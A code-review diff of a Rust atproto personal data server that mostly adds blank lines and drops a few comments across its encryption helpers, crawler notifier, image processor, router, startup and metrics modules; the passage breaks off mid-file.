151 pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> { 152 if encrypted.len() < 12 { 153 return Err("Encrypted data too short".to_string()); 154 } 155 + 156 let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key) 157 .map_err(|e| format!("Failed to create cipher: {}", e))?; 158 + 159 #[allow(deprecated)] 160 let nonce = Nonce::from_slice(&encrypted[..12]); 161 let ciphertext = &encrypted[12..]; 162 + 163 cipher 164 .decrypt(nonce, ciphertext) 165 .map_err(|e| format!("Decryption failed: {}", e)) 166 } 167 } 168 + 169 pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> { 170 AuthConfig::get().encrypt_user_key(plaintext) 171 } 172 + 173 pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> { 174 match version.unwrap_or(0) { 175 0 => Ok(encrypted.to_vec()),
+19
src/crawlers.rs
··· 6 use std::time::Duration; 7 use tokio::sync::{broadcast, watch}; 8 use tracing::{debug, error, info, warn}; 9 const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60; 10 pub struct Crawlers { 11 hostname: String, 12 crawler_urls: Vec<String>, ··· 14 last_notified: AtomicU64, 15 circuit_breaker: Option<Arc<CircuitBreaker>>, 16 } 17 impl Crawlers { 18 pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self { 19 Self { ··· 27 circuit_breaker: None, 28 } 29 } 30 pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self { 31 self.circuit_breaker = Some(circuit_breaker); 32 self 33 } 34 pub fn from_env() -> Option<Self> { 35 let hostname = std::env::var("PDS_HOSTNAME").ok()?; 36 let crawler_urls: Vec<String> = std::env::var("CRAWLERS") 37 .unwrap_or_default() 38 .split(',') 39 .filter(|s| !s.is_empty()) 40 .map(|s| s.trim().to_string()) 41 .collect(); 42 if crawler_urls.is_empty() { 43 return None; 44 } 45 Some(Self::new(hostname, crawler_urls)) 46 } 47 fn should_notify(&self) -> bool { 48 let now = std::time::SystemTime::now() 49 .duration_since(std::time::UNIX_EPOCH) 50 .unwrap_or_default() 51 .as_secs(); 52 let last = self.last_notified.load(Ordering::Relaxed); 53 now - last >= NOTIFY_THRESHOLD_SECS 54 } 55 fn mark_notified(&self) { 56 let now = std::time::SystemTime::now() 57 .duration_since(std::time::UNIX_EPOCH) 58 .unwrap_or_default() 59 .as_secs(); 60 self.last_notified.store(now, Ordering::Relaxed); 61 } 62 pub async fn notify_of_update(&self) { 63 if !self.should_notify() { 64 debug!("Skipping crawler notification due to debounce"); 65 return; 66 } 67 if let Some(cb) = &self.circuit_breaker { 68 if !cb.can_execute().await { 69 debug!("Skipping crawler notification due to circuit breaker open"); 70 return; 71 } 72 } 73 self.mark_notified(); 74 let circuit_breaker = self.circuit_breaker.clone(); 75 for crawler_url in &self.crawler_urls { 76 let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/')); 77 let hostname = self.hostname.clone(); 78 let client = self.http_client.clone(); 79 let cb = circuit_breaker.clone(); 80 tokio::spawn(async move { 81 match client 82 .post(&url) ··· 116 } 117 } 118 } 119 pub async fn start_crawlers_service( 120 crawlers: Arc<Crawlers>, 121 mut firehose_rx: broadcast::Receiver<SequencedEvent>, ··· 127 crawlers = ?crawlers.crawler_urls, 128 "Starting crawlers notification service" 129 ); 130 loop { 131 tokio::select! { 132 result = firehose_rx.recv() => {
··· 6 use std::time::Duration; 7 use tokio::sync::{broadcast, watch}; 8 use tracing::{debug, error, info, warn}; 9 + 10 const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60; 11 + 12 pub struct Crawlers { 13 hostname: String, 14 crawler_urls: Vec<String>, ··· 16 last_notified: AtomicU64, 17 circuit_breaker: Option<Arc<CircuitBreaker>>, 18 } 19 + 20 impl Crawlers { 21 pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self { 22 Self { ··· 30 circuit_breaker: None, 31 } 32 } 33 + 34 pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self { 35 self.circuit_breaker = Some(circuit_breaker); 36 self 37 } 38 + 39 pub fn from_env() -> Option<Self> { 40 let hostname = std::env::var("PDS_HOSTNAME").ok()?; 41 + 42 let crawler_urls: Vec<String> = std::env::var("CRAWLERS") 43 .unwrap_or_default() 44 .split(',') 45 .filter(|s| !s.is_empty()) 46 .map(|s| s.trim().to_string()) 47 .collect(); 48 + 49 if crawler_urls.is_empty() { 50 return None; 51 } 52 + 53 Some(Self::new(hostname, crawler_urls)) 54 } 55 + 56 fn should_notify(&self) -> bool { 57 let now = std::time::SystemTime::now() 58 .duration_since(std::time::UNIX_EPOCH) 59 .unwrap_or_default() 60 .as_secs(); 61 + 62 let last = self.last_notified.load(Ordering::Relaxed); 63 now - last >= NOTIFY_THRESHOLD_SECS 64 } 65 + 66 fn mark_notified(&self) { 67 let now = std::time::SystemTime::now() 68 .duration_since(std::time::UNIX_EPOCH) 69 .unwrap_or_default() 70 .as_secs(); 71 + 72 self.last_notified.store(now, Ordering::Relaxed); 73 } 74 + 75 pub async fn notify_of_update(&self) { 76 if !self.should_notify() { 77 debug!("Skipping crawler notification due to debounce"); 78 return; 79 } 80 + 81 if let Some(cb) = &self.circuit_breaker { 82 if !cb.can_execute().await { 83 debug!("Skipping crawler notification due to circuit breaker open"); 84 return; 85 } 86 } 87 + 88 self.mark_notified(); 89 let circuit_breaker = self.circuit_breaker.clone(); 90 + 91 for crawler_url in &self.crawler_urls { 92 let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/')); 93 let hostname = self.hostname.clone(); 94 let client = self.http_client.clone(); 95 let cb = circuit_breaker.clone(); 96 + 97 tokio::spawn(async move { 98 match client 99 .post(&url) ··· 133 } 134 } 135 } 136 + 137 pub async fn start_crawlers_service( 138 crawlers: Arc<Crawlers>, 139 mut firehose_rx: broadcast::Receiver<SequencedEvent>, ··· 145 crawlers = ?crawlers.crawler_urls, 146 "Starting crawlers notification service" 147 ); 148 + 149 loop { 150 tokio::select! { 151 result = firehose_rx.recv() => {
+28 -1
src/image/mod.rs
··· 1 use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType}; 2 use std::io::Cursor; 3 pub const THUMB_SIZE_FEED: u32 = 200; 4 pub const THUMB_SIZE_FULL: u32 = 1000; 5 #[derive(Debug, Clone)] 6 pub struct ProcessedImage { 7 pub data: Vec<u8>, ··· 9 pub width: u32, 10 pub height: u32, 11 } 12 #[derive(Debug, Clone)] 13 pub struct ImageProcessingResult { 14 pub original: ProcessedImage, 15 pub thumbnail_feed: Option<ProcessedImage>, 16 pub thumbnail_full: Option<ProcessedImage>, 17 } 18 #[derive(Debug, thiserror::Error)] 19 pub enum ImageError { 20 #[error("Failed to decode image: {0}")] ··· 32 #[error("File too large: {size} bytes exceeds maximum {max_size} bytes")] 33 FileTooLarge { size: usize, max_size: usize }, 34 } 35 - pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB 36 pub struct ImageProcessor { 37 max_dimension: u32, 38 max_file_size: usize, 39 output_format: OutputFormat, 40 generate_thumbnails: bool, 41 } 42 #[derive(Debug, Clone, Copy)] 43 pub enum OutputFormat { 44 WebP, ··· 46 Png, 47 Original, 48 } 49 impl Default for ImageProcessor { 50 fn default() -> Self { 51 Self { ··· 56 } 57 } 58 } 59 impl ImageProcessor { 60 pub fn new() -> Self { 61 Self::default() 62 } 63 pub fn with_max_dimension(mut self, max: u32) -> Self { 64 self.max_dimension = max; 65 self 66 } 67 pub fn with_max_file_size(mut self, max: usize) -> Self { 68 self.max_file_size = max; 69 self 70 } 71 pub fn with_output_format(mut self, format: OutputFormat) -> Self { 72 self.output_format = format; 73 self 74 } 75 pub fn with_thumbnails(mut self, generate: bool) -> Self { 76 self.generate_thumbnails = generate; 77 self 78 } 79 pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> { 80 if data.len() > self.max_file_size { 81 return Err(ImageError::FileTooLarge { ··· 109 thumbnail_full, 110 }) 111 } 112 fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> { 113 match mime_type.to_lowercase().as_str() { 114 "image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg), ··· 124 } 125 } 126 } 127 fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> { 128 let cursor = Cursor::new(data); 129 let reader = ImageReader::with_format(cursor, format); ··· 131 .decode() 132 .map_err(|e| ImageError::DecodeError(e.to_string())) 133 } 134 fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> { 135 let (data, mime_type) = match self.output_format { 136 OutputFormat::WebP => { ··· 165 height: img.height(), 166 }) 167 } 168 fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> { 169 let (orig_width, orig_height) = (img.width(), img.height()); 170 let (new_width, new_height) = if orig_width > orig_height { ··· 177 let thumb = img.resize(new_width, new_height, FilterType::Lanczos3); 178 self.encode_image(&thumb) 179 } 180 pub fn is_supported_mime_type(mime_type: &str) -> bool { 181 matches!( 182 mime_type.to_lowercase().as_str(), 183 "image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp" 184 ) 185 } 186 pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> { 187 let format = image::guess_format(data) 188 .map_err(|e| ImageError::DecodeError(e.to_string()))?; ··· 196 Ok(buf) 197 } 198 } 199 #[cfg(test)] 200 mod tests { 201 use super::*; 202 fn create_test_image(width: u32, height: u32) -> Vec<u8> { 203 let img = DynamicImage::new_rgb8(width, height); 204 let mut buf = Vec::new(); 205 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 206 buf 207 } 208 #[test] 209 fn test_process_small_image() { 210 let processor = ImageProcessor::new(); ··· 213 assert!(result.thumbnail_feed.is_none()); 214 assert!(result.thumbnail_full.is_none()); 215 } 216 #[test] 217 fn test_process_large_image_generates_thumbnails() { 218 let processor = ImageProcessor::new(); ··· 227 assert!(full_thumb.width <= THUMB_SIZE_FULL); 228 assert!(full_thumb.height <= THUMB_SIZE_FULL); 229 } 230 #[test] 231 fn test_webp_conversion() { 232 let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); ··· 234 let result = processor.process(&data, "image/png").unwrap(); 235 assert_eq!(result.original.mime_type, "image/webp"); 236 } 237 #[test] 238 fn test_reject_too_large() { 239 let processor = ImageProcessor::new().with_max_dimension(1000); ··· 241 let result = processor.process(&data, "image/png"); 242 assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 243 } 244 #[test] 245 fn test_is_supported_mime_type() { 246 assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
··· 1 use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType}; 2 use std::io::Cursor; 3 + 4 pub const THUMB_SIZE_FEED: u32 = 200; 5 pub const THUMB_SIZE_FULL: u32 = 1000; 6 + 7 #[derive(Debug, Clone)] 8 pub struct ProcessedImage { 9 pub data: Vec<u8>, ··· 11 pub width: u32, 12 pub height: u32, 13 } 14 + 15 #[derive(Debug, Clone)] 16 pub struct ImageProcessingResult { 17 pub original: ProcessedImage, 18 pub thumbnail_feed: Option<ProcessedImage>, 19 pub thumbnail_full: Option<ProcessedImage>, 20 } 21 + 22 #[derive(Debug, thiserror::Error)] 23 pub enum ImageError { 24 #[error("Failed to decode image: {0}")] ··· 36 #[error("File too large: {size} bytes exceeds maximum {max_size} bytes")] 37 FileTooLarge { size: usize, max_size: usize }, 38 } 39 + 40 + pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; 41 + 42 pub struct ImageProcessor { 43 max_dimension: u32, 44 max_file_size: usize, 45 output_format: OutputFormat, 46 generate_thumbnails: bool, 47 } 48 + 49 #[derive(Debug, Clone, Copy)] 50 pub enum OutputFormat { 51 WebP, ··· 53 Png, 54 Original, 55 } 56 + 57 impl Default for ImageProcessor { 58 fn default() -> Self { 59 Self { ··· 64 } 65 } 66 } 67 + 68 impl ImageProcessor { 69 pub fn new() -> Self { 70 Self::default() 71 } 72 + 73 pub fn with_max_dimension(mut self, max: u32) -> Self { 74 self.max_dimension = max; 75 self 76 } 77 + 78 pub fn with_max_file_size(mut self, max: usize) -> Self { 79 self.max_file_size = max; 80 self 81 } 82 + 83 pub fn with_output_format(mut self, format: OutputFormat) -> Self { 84 self.output_format = format; 85 self 86 } 87 + 88 pub fn with_thumbnails(mut self, generate: bool) -> Self { 89 self.generate_thumbnails = generate; 90 self 91 } 92 + 93 pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> { 94 if data.len() > self.max_file_size { 95 return Err(ImageError::FileTooLarge { ··· 123 thumbnail_full, 124 }) 125 } 126 + 127 fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> { 128 match mime_type.to_lowercase().as_str() { 129 "image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg), ··· 139 } 140 } 141 } 142 + 143 fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> { 144 let cursor = Cursor::new(data); 145 let reader = ImageReader::with_format(cursor, format); ··· 147 .decode() 148 .map_err(|e| ImageError::DecodeError(e.to_string())) 149 } 150 + 151 fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> { 152 let (data, mime_type) = match self.output_format { 153 OutputFormat::WebP => { ··· 182 height: img.height(), 183 }) 184 } 185 + 186 fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> { 187 let (orig_width, orig_height) = (img.width(), img.height()); 188 let (new_width, new_height) = if orig_width > orig_height { ··· 195 let thumb = img.resize(new_width, new_height, FilterType::Lanczos3); 196 self.encode_image(&thumb) 197 } 198 + 199 pub fn is_supported_mime_type(mime_type: &str) -> bool { 200 matches!( 201 mime_type.to_lowercase().as_str(), 202 "image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp" 203 ) 204 } 205 + 206 pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> { 207 let format = image::guess_format(data) 208 .map_err(|e| ImageError::DecodeError(e.to_string()))?; ··· 216 Ok(buf) 217 } 218 } 219 + 220 #[cfg(test)] 221 mod tests { 222 use super::*; 223 + 224 fn create_test_image(width: u32, height: u32) -> Vec<u8> { 225 let img = DynamicImage::new_rgb8(width, height); 226 let mut buf = Vec::new(); 227 img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 228 buf 229 } 230 + 231 #[test] 232 fn test_process_small_image() { 233 let processor = ImageProcessor::new(); ··· 236 assert!(result.thumbnail_feed.is_none()); 237 assert!(result.thumbnail_full.is_none()); 238 } 239 + 240 #[test] 241 fn test_process_large_image_generates_thumbnails() { 242 let processor = ImageProcessor::new(); ··· 251 assert!(full_thumb.width <= THUMB_SIZE_FULL); 252 assert!(full_thumb.height <= THUMB_SIZE_FULL); 253 } 254 + 255 #[test] 256 fn test_webp_conversion() { 257 let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); ··· 259 let result = processor.process(&data, "image/png").unwrap(); 260 assert_eq!(result.original.mime_type, "image/webp"); 261 } 262 + 263 #[test] 264 fn test_reject_too_large() { 265 let processor = ImageProcessor::new().with_max_dimension(1000); ··· 267 let result = processor.process(&data, "image/png"); 268 assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 269 } 270 + 271 #[test] 272 fn test_is_supported_mime_type() { 273 assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
+4 -1
src/lib.rs
··· 16 pub mod sync; 17 pub mod util; 18 pub mod validation; 19 use axum::{ 20 Router, 21 http::Method, ··· 25 use state::AppState; 26 use tower_http::cors::{Any, CorsLayer}; 27 use tower_http::services::{ServeDir, ServeFile}; 28 pub fn app(state: AppState) -> Router { 29 let router = Router::new() 30 .route("/metrics", get(metrics::metrics_handler)) ··· 358 .route("/.well-known/did.json", get(api::identity::well_known_did)) 359 .route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did)) 360 .route("/u/{handle}/did.json", get(api::identity::user_did_doc)) 361 - // OAuth 2.1 endpoints 362 .route( 363 "/.well-known/oauth-protected-resource", 364 get(oauth::endpoints::oauth_protected_resource), ··· 402 .allow_headers(Any), 403 ) 404 .with_state(state); 405 let frontend_dir = std::env::var("FRONTEND_DIR") 406 .unwrap_or_else(|_| "./frontend/dist".to_string()); 407 if std::path::Path::new(&frontend_dir).join("index.html").exists() { 408 let index_path = format!("{}/index.html", frontend_dir); 409 let serve_dir = ServeDir::new(&frontend_dir)
··· 16 pub mod sync; 17 pub mod util; 18 pub mod validation; 19 + 20 use axum::{ 21 Router, 22 http::Method, ··· 26 use state::AppState; 27 use tower_http::cors::{Any, CorsLayer}; 28 use tower_http::services::{ServeDir, ServeFile}; 29 + 30 pub fn app(state: AppState) -> Router { 31 let router = Router::new() 32 .route("/metrics", get(metrics::metrics_handler)) ··· 360 .route("/.well-known/did.json", get(api::identity::well_known_did)) 361 .route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did)) 362 .route("/u/{handle}/did.json", get(api::identity::user_did_doc)) 363 .route( 364 "/.well-known/oauth-protected-resource", 365 get(oauth::endpoints::oauth_protected_resource), ··· 403 .allow_headers(Any), 404 ) 405 .with_state(state); 406 + 407 let frontend_dir = std::env::var("FRONTEND_DIR") 408 .unwrap_or_else(|_| "./frontend/dist".to_string()); 409 + 410 if std::path::Path::new(&frontend_dir).join("index.html").exists() { 411 let index_path = format!("{}/index.html", frontend_dir); 412 let serve_dir = ServeDir::new(&frontend_dir)
+30
src/main.rs
··· 6 use std::sync::Arc; 7 use tokio::sync::watch; 8 use tracing::{error, info, warn}; 9 #[tokio::main] 10 async fn main() -> ExitCode { 11 dotenvy::dotenv().ok(); 12 tracing_subscriber::fmt::init(); 13 bspds::metrics::init_metrics(); 14 match run().await { 15 Ok(()) => ExitCode::SUCCESS, 16 Err(e) => { ··· 19 } 20 } 21 } 22 async fn run() -> Result<(), Box<dyn std::error::Error>> { 23 let database_url = std::env::var("DATABASE_URL") 24 .map_err(|_| "DATABASE_URL environment variable must be set")?; 25 let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS") 26 .ok() 27 .and_then(|v| v.parse().ok()) 28 .unwrap_or(100); 29 let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS") 30 .ok() 31 .and_then(|v| v.parse().ok()) 32 .unwrap_or(10); 33 let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS") 34 .ok() 35 .and_then(|v| v.parse().ok()) 36 .unwrap_or(10); 37 info!( 38 "Configuring database pool: max={}, min={}, acquire_timeout={}s", 39 max_connections, min_connections, acquire_timeout_secs 40 ); 41 let pool = sqlx::postgres::PgPoolOptions::new() 42 .max_connections(max_connections) 43 .min_connections(min_connections) ··· 47 .connect(&database_url) 48 .await 49 .map_err(|e| format!("Failed to connect to Postgres: {}", e))?; 50 sqlx::migrate!("./migrations") 51 .run(&pool) 52 .await 53 .map_err(|e| format!("Failed to run migrations: {}", e))?; 54 let state = AppState::new(pool.clone()).await; 55 bspds::sync::listener::start_sequencer_listener(state.clone()).await; 56 let (shutdown_tx, shutdown_rx) = watch::channel(false); 57 let mut notification_service = NotificationService::new(pool); 58 if let Some(email_sender) = EmailSender::from_env() { 59 info!("Email notifications enabled"); 60 notification_service = notification_service.register_sender(email_sender); 61 } else { 62 warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)"); 63 } 64 if let Some(discord_sender) = DiscordSender::from_env() { 65 info!("Discord notifications enabled"); 66 notification_service = notification_service.register_sender(discord_sender); 67 } 68 if let Some(telegram_sender) = TelegramSender::from_env() { 69 info!("Telegram notifications enabled"); 70 notification_service = notification_service.register_sender(telegram_sender); 71 } 72 if let Some(signal_sender) = SignalSender::from_env() { 73 info!("Signal notifications enabled"); 74 notification_service = notification_service.register_sender(signal_sender); 75 } 76 let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone())); 77 let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() { 78 let crawlers = Arc::new( 79 crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()) ··· 85 warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)"); 86 None 87 }; 88 let app = bspds::app(state); 89 let addr = SocketAddr::from(([127, 0, 0, 1], 3000)); 90 info!("listening on {}", addr); 91 let listener = tokio::net::TcpListener::bind(addr) 92 .await 93 .map_err(|e| format!("Failed to bind to {}: {}", addr, e))?; 94 let server_result = axum::serve(listener, app) 95 .with_graceful_shutdown(shutdown_signal(shutdown_tx)) 96 .await; 97 notification_handle.await.ok(); 98 if let Some(handle) = crawlers_handle { 99 handle.await.ok(); 100 } 101 if let Err(e) = server_result { 102 return Err(format!("Server error: {}", e).into()); 103 } 104 Ok(()) 105 } 106 async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) { 107 let ctrl_c = async { 108 match tokio::signal::ctrl_c().await { ··· 112 } 113 } 114 }; 115 #[cfg(unix)] 116 let terminate = async { 117 match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) { ··· 124 } 125 } 126 }; 127 #[cfg(not(unix))] 128 let terminate = std::future::pending::<()>(); 129 tokio::select! { 130 _ = ctrl_c => {}, 131 _ = terminate => {}, 132 } 133 info!("Shutdown signal received, stopping services..."); 134 shutdown_tx.send(true).ok(); 135 }
··· 6 use std::sync::Arc; 7 use tokio::sync::watch; 8 use tracing::{error, info, warn}; 9 + 10 #[tokio::main] 11 async fn main() -> ExitCode { 12 dotenvy::dotenv().ok(); 13 tracing_subscriber::fmt::init(); 14 bspds::metrics::init_metrics(); 15 + 16 match run().await { 17 Ok(()) => ExitCode::SUCCESS, 18 Err(e) => { ··· 21 } 22 } 23 } 24 + 25 async fn run() -> Result<(), Box<dyn std::error::Error>> { 26 let database_url = std::env::var("DATABASE_URL") 27 .map_err(|_| "DATABASE_URL environment variable must be set")?; 28 + 29 let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS") 30 .ok() 31 .and_then(|v| v.parse().ok()) 32 .unwrap_or(100); 33 + 34 let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS") 35 .ok() 36 .and_then(|v| v.parse().ok()) 37 .unwrap_or(10); 38 + 39 let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS") 40 .ok() 41 .and_then(|v| v.parse().ok()) 42 .unwrap_or(10); 43 + 44 info!( 45 "Configuring database pool: max={}, min={}, acquire_timeout={}s", 46 max_connections, min_connections, acquire_timeout_secs 47 ); 48 + 49 let pool = sqlx::postgres::PgPoolOptions::new() 50 .max_connections(max_connections) 51 .min_connections(min_connections) ··· 55 .connect(&database_url) 56 .await 57 .map_err(|e| format!("Failed to connect to Postgres: {}", e))?; 58 + 59 sqlx::migrate!("./migrations") 60 .run(&pool) 61 .await 62 .map_err(|e| format!("Failed to run migrations: {}", e))?; 63 + 64 let state = AppState::new(pool.clone()).await; 65 bspds::sync::listener::start_sequencer_listener(state.clone()).await; 66 + 67 let (shutdown_tx, shutdown_rx) = watch::channel(false); 68 + 69 let mut notification_service = NotificationService::new(pool); 70 + 71 if let Some(email_sender) = EmailSender::from_env() { 72 info!("Email notifications enabled"); 73 notification_service = notification_service.register_sender(email_sender); 74 } else { 75 warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)"); 76 } 77 + 78 if let Some(discord_sender) = DiscordSender::from_env() { 79 info!("Discord notifications enabled"); 80 notification_service = notification_service.register_sender(discord_sender); 81 } 82 + 83 if let Some(telegram_sender) = TelegramSender::from_env() { 84 info!("Telegram notifications enabled"); 85 notification_service = notification_service.register_sender(telegram_sender); 86 } 87 + 88 if let Some(signal_sender) = SignalSender::from_env() { 89 info!("Signal notifications enabled"); 90 notification_service = notification_service.register_sender(signal_sender); 91 } 92 + 93 let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone())); 94 + 95 let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() { 96 let crawlers = Arc::new( 97 crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()) ··· 103 warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)"); 104 None 105 }; 106 + 107 let app = bspds::app(state); 108 let addr = SocketAddr::from(([127, 0, 0, 1], 3000)); 109 info!("listening on {}", addr); 110 + 111 let listener = tokio::net::TcpListener::bind(addr) 112 .await 113 .map_err(|e| format!("Failed to bind to {}: {}", addr, e))?; 114 + 115 let server_result = axum::serve(listener, app) 116 .with_graceful_shutdown(shutdown_signal(shutdown_tx)) 117 .await; 118 + 119 notification_handle.await.ok(); 120 + 121 if let Some(handle) = crawlers_handle { 122 handle.await.ok(); 123 } 124 + 125 if let Err(e) = server_result { 126 return Err(format!("Server error: {}", e).into()); 127 } 128 + 129 Ok(()) 130 } 131 + 132 async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) { 133 let ctrl_c = async { 134 match tokio::signal::ctrl_c().await { ··· 138 } 139 } 140 }; 141 + 142 #[cfg(unix)] 143 let terminate = async { 144 match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) { ··· 151 } 152 } 153 }; 154 + 155 #[cfg(not(unix))] 156 let terminate = std::future::pending::<()>(); 157 + 158 tokio::select! { 159 _ = ctrl_c => {}, 160 _ = terminate => {}, 161 } 162 + 163 info!("Shutdown signal received, stopping services..."); 164 shutdown_tx.send(true).ok(); 165 }
+28
src/metrics.rs
··· 8 use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle}; 9 use std::sync::OnceLock; 10 use std::time::Instant; 11 static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new(); 12 pub fn init_metrics() -> PrometheusHandle { 13 let builder = PrometheusBuilder::new(); 14 let handle = builder 15 .install_recorder() 16 .expect("failed to install Prometheus recorder"); 17 PROMETHEUS_HANDLE.set(handle.clone()).ok(); 18 describe_metrics(); 19 handle 20 } 21 fn describe_metrics() { 22 metrics::describe_counter!( 23 "bspds_http_requests_total", ··· 68 "Database query duration in seconds" 69 ); 70 } 71 pub async fn metrics_handler() -> impl IntoResponse { 72 match PROMETHEUS_HANDLE.get() { 73 Some(handle) => { ··· 81 ), 82 } 83 } 84 pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response { 85 let start = Instant::now(); 86 let method = request.method().to_string(); 87 let path = normalize_path(request.uri().path()); 88 let response = next.run(request).await; 89 let duration = start.elapsed().as_secs_f64(); 90 let status = response.status().as_u16().to_string(); 91 counter!( 92 "bspds_http_requests_total", 93 "method" => method.clone(), ··· 95 "status" => status.clone() 96 ) 97 .increment(1); 98 histogram!( 99 "bspds_http_request_duration_seconds", 100 "method" => method, 101 "path" => path 102 ) 103 .record(duration); 104 response 105 } 106 fn normalize_path(path: &str) -> String { 107 if path.starts_with("/xrpc/") { 108 if let Some(method) = path.strip_prefix("/xrpc/") { ··· 112 return path.to_string(); 113 } 114 } 115 if path.starts_with("/u/") && path.ends_with("/did.json") { 116 return "/u/{handle}/did.json".to_string(); 117 } 118 if path.starts_with("/oauth/") { 119 return path.to_string(); 120 } 121 path.to_string() 122 } 123 pub fn record_auth_cache_hit(cache_type: &str) { 124 counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1); 125 } 126 pub fn record_auth_cache_miss(cache_type: &str) { 127 counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1); 128 } 129 pub fn set_firehose_subscribers(count: usize) { 130 gauge!("bspds_firehose_subscribers").set(count as f64); 131 } 132 pub fn increment_firehose_subscribers() { 133 counter!("bspds_firehose_events_total").increment(1); 134 } 135 pub fn record_firehose_event() { 136 counter!("bspds_firehose_events_total").increment(1); 137 } 138 pub fn record_block_operation(op_type: &str) { 139 counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1); 140 } 141 pub fn record_s3_operation(op_type: &str, status: &str) { 142 counter!( 143 "bspds_s3_operations_total", ··· 146 ) 147 .increment(1); 148 } 149 pub fn set_notification_queue_size(size: usize) { 150 gauge!("bspds_notification_queue_size").set(size as f64); 151 } 152 pub fn record_rate_limit_rejection(limiter: &str) { 153 counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1); 154 } 155 pub fn record_db_query(query_type: &str, duration_seconds: f64) { 156 counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1); 157 histogram!( ··· 160 ) 161 .record(duration_seconds); 162 } 163 #[cfg(test)] 164 mod tests { 165 use super::*; 166 #[test] 167 fn test_normalize_path() { 168 assert_eq!(
··· 8 use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle}; 9 use std::sync::OnceLock; 10 use std::time::Instant; 11 + 12 static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new(); 13 + 14 pub fn init_metrics() -> PrometheusHandle { 15 let builder = PrometheusBuilder::new(); 16 let handle = builder 17 .install_recorder() 18 .expect("failed to install Prometheus recorder"); 19 + 20 PROMETHEUS_HANDLE.set(handle.clone()).ok(); 21 describe_metrics(); 22 + 23 handle 24 } 25 + 26 fn describe_metrics() { 27 metrics::describe_counter!( 28 "bspds_http_requests_total", ··· 73 "Database query duration in seconds" 74 ); 75 } 76 + 77 pub async fn metrics_handler() -> impl IntoResponse { 78 match PROMETHEUS_HANDLE.get() { 79 Some(handle) => { ··· 87 ), 88 } 89 } 90 + 91 pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response { 92 let start = Instant::now(); 93 let method = 